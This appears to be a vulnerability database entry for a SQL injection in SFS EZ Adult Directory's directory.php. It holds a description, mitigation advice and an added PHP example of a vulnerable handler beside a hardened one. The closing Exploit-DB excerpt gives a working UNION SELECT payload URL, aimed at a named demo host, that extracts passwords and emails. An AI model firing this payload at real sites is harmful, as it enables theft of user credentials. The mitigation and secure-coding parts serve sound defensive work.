Vendor: SFS EZ Adult Directory
By: Darckc0de
CVSS: 9 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: SFS EZ Adult Directory
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

SFS EZ Adult Directory (directory.php id) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in SFS EZ Adult Directory. It is caused by improper sanitization of user-supplied input in the 'cat_id' parameter of the 'directory.php' script: an attacker can exploit it by sending a malicious HTTP request to the vulnerable script, and successful exploitation can result in unauthorized access to sensitive information such as passwords and emails.

Mitigation:

To mitigate this vulnerability, the application should validate user-supplied input and sanitize it before using it in SQL queries.
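The following is an added example, not code from SFS EZ Adult Directory or from the advisory author. It shows the pattern the advisory describes (a request parameter concatenated straight into a query) next to a hardened handler that validates 'cat_id' as an integer and binds it with a prepared statement. The table and column names ('links', 'cat_id', 'title', 'url') and the PDO/SQLite setup are assumptions made for illustration only.

```php
<?php
// Added example (not the SFS EZ Adult Directory code). Table and column names
// ('links', 'cat_id', 'title', 'url') are assumptions for illustration.

// BEFORE: the raw value of $_GET['cat_id'] is concatenated into the SQL text,
// so whatever the client sends becomes part of the query.
function list_links_vulnerable(PDO $db, array $get): array
{
    $sql = "SELECT id, title, url FROM links WHERE cat_id = " . ($get['cat_id'] ?? '');
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// AFTER: validate the type first (cat_id must be a positive integer), then bind
// the value as a parameter so the database never interprets it as SQL.
function list_links_hardened(PDO $db, array $get): array
{
    $catId = filter_var(
        $get['cat_id'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($catId === false) {
        http_response_code(400);   // reject the request; no query is executed
        return [];
    }
    $stmt = $db->prepare('SELECT id, title, url FROM links WHERE cat_id = :cat_id');
    $stmt->bindValue(':cat_id', $catId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Offline demonstration with an in-memory SQLite database and constructed rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE links (id INTEGER PRIMARY KEY, cat_id INTEGER, title TEXT, url TEXT)');
$db->exec("INSERT INTO links (cat_id, title, url) VALUES
    (1, 'first',  'http://example.invalid/1'),
    (2, 'second', 'http://example.invalid/2')");

// A well-formed request returns only the requested category with either handler.
var_dump(count(list_links_vulnerable($db, ['cat_id' => '1'])) === 1);
var_dump(count(list_links_hardened($db, ['cat_id' => '1'])) === 1);

// A request whose cat_id is not a number: the unchecked handler lets it alter
// the WHERE clause and returns rows from every category, while the hardened
// handler rejects it before any query runs.
var_dump(count(list_links_vulnerable($db, ['cat_id' => '1 OR 1=1'])) === 2);
var_dump(list_links_hardened($db, ['cat_id' => '1 OR 1=1']) === []);
```

Run it with `php example.php` on a PHP build that includes the pdo_sqlite extension. The validation step is what turns a malformed parameter into a 400 response instead of a database error, and the bound parameter is what keeps a syntactically valid but unexpected value from changing the query's structure; the same two steps apply to every other request parameter the script reads.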

Exploit-DB raw data:

==================================================================================
   SFS EZ Adult Directory (directory.php id) Remote SQL Injection Vulnerability
==================================================================================
			   __  __           __          
			   / / / /_  _______/ /__  __  __
			  / /_/ / / / / ___/ / _ \/ / / /
			 / __  / /_/ / /  / /  __/ /_/ / 
			/_/ /_/\__,_/_/  /_/\___/\__, /  
			                        /____/   
==================================================================================
----------------------------------------------------------------------------------
Website script: http://www.scripts-for-sites.info/index.php
----------------------------------------------------------------------------------
Exploit:      http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit]
----------------------------------------------------------------------------------
LiveDemo:
http://turnkeyzone.com/demos/adultdir/directory.php?ax=list&sub=6&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/*
----------------------------------------------------------------------------------
==================================================================================
Special Thx : Darckc0de
==================================================================================

# milw0rm.com [2008-10-31]